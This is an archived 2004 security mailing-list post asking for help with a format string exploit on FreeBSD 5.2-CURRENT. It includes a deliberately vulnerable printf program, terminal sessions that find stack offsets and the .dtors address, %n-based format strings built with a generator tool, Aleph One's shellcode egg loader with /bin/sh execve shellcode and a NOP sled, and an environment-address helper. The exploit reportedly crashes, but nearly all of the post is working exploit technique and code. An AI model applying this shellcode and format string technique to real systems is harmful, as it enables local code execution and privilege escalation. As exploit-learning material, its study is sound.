|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Problem with format string exploit dev in FreeBSD 5.2-CURRENT
From: Ganbold (ganbold
micom.mng.net)
Date: Thu Jul 29 2004 - 03:02:50 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi all,
I have sample format string exploit problem in FreeBSD 5.2-CURRENT.
$uname -an
FreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3 11:09:58
ULAT 2004 tsganlocalhost:/usr/obj/usr/src/sys/MX i386
I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build the
format string.
I can get the offset:
---------------------------------------------------------------------------------------------------------
bash-2.05b$ ./fmt_vuln "AAAA %x %x %x %x %x %x"
The right way:
AAAA %x %x %x %x %x %x
The wrong way:
AAAA bfbfdfb8 0 0 0 0 41414141
[*] test_val 0x0804977c = -72 0xffffffb8
---------------------------------------------------------------------------------------------------------
Then I'm getting DTORs address:
---------------------------------------------------------------------------------------------------------
bash-2.05b$ objdump -s -j .dtors fmt_vuln
fmt_vuln: file format elf32-i386-freebsd
Contents of section .dtors:
8049824 ffffffff 00000000 ........
bash-2.05b$ nm ./fmt_vuln|grep DTOR
08049828 d __DTOR_END__
08049824 d __DTOR_LIST__
---------------------------------------------------------------------------------------------------------
Afterwards I'm storing shellcode in env using AlephOne's exploit code (See
below).
---------------------------------------------------------------------------------------------------------
$ ./getsx1 200
Using address: 0xbfbfec78
bash-2.05b$
bash-2.05b$ ./getenvaddr EGG
EGG is located at 0xbfbfe557
---------------------------------------------------------------------------------------------------------
When I run exploit I get:
---------------------------------------------------------------------------------------------------------
bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049828 -r 0xbfbfe557 -o 6 -b 0`
Format string builder version 0.2
(C) 2001 Pappy & Zorgon
[ Building the fmt string ... ]
[ Building completed (52) ]
[ Checking the fmt string ... ]
[ Checking completed (52) ]
[ fmt string ] = %327x%6$n%398x%7$n%218x%8$n%256x%9$n
The right way:
%327x%6$n%398x%7$n%218x%8$n%256x%9$n
The wrong way:
Bus error (core dumped)
bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049824 -r 0xbfbfe557 -o 6 -b 0`
Format string builder version 0.2
(C) 2001 Pappy & Zorgon
[ Building the fmt string ... ]
[ Building completed (52) ]
[ Checking the fmt string ... ]
Found a % at 4.
[ Checking completed (52) ]
[ fmt string ] = %%327x%6$n%398x%7$n%218x%8$n%256x%9$n
The right way:
%%327x%6$n%398x%7$n%218x%8$n%256x%9$n
The wrong way:
Bus error (core dumped)
---------------------------------------------------------------------------------------------------------
So I get Bus error (core dumped) result. But in my opinion I should get shell.
Somehow exploit is not working and I don't know the reason.
I tried many times and no result.
It seems like format string exploit in FreeBSD is different than Linux.
Does anybody have experience developing format string exploit in FreeBSD
before?
Did somebody solve this kind of problem before?
Can somebody give me some hints, advices and guides?
I googled for this kind of problem, and find only in this list last June
someone had problem,
but didn't find the solution.
Can somebody help me in this regard?
thanks in advance,
Ganbold
Followings are vulnerable program, getenvaddr.c, Aleph One exploit:
---------------------------------------------------------------------------------------------------------
Vulnerable program:
---------------------------------------------------------------------------------------------------------
#include <stdlib.h>
int main(int argc, char *argv[])
{
char text[1024];
static int test_val = -72;
if(argc < 2)
{
printf("Usage: %s <text to print>\n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way:\n");
printf("%s", text);
printf("\nThe wrong way:\n");
printf(text);
printf("\n");
// Debug output
printf("[*] test_val 0x%08x = %d 0x%08x\n", &test_val, test_val,
test_val);
exit(0);
}
---------------------------------------------------------------------------------------------------------
Aleph One's exploit code
---------------------------------------------------------------------------------------------------------
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\x31\xc0" /* xorl %eax, %eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp, %ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe2" /* movl %esp, %edx */
"\x50" /* pushl %eax */
"\x52" /* pushl %edx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xb0\x3b" /* movb $0x3b, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax, %eax */
"\x40" /* inc %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xcd\x80"; /* int $0x80 */
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/usr/local/bin/bash");
}
---------------------------------------------------------------------------------------------------------
getenvaddr.c
---------------------------------------------------------------------------------------------------------
#include <stdlib.h>
int main(int argc, char *argv[])
{
char *addr;
if(argc < 2)
{
printf("Usage:\n%s <environment variable name>\n", argv[0]);
exit(0);
}
addr = getenv(argv[1]);
if(addr == NULL)
printf("The environment variable %s doesn't exist.\n", argv[1]);
else
printf("%s is located at %p\n", argv[1], addr);
return 0;
}
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]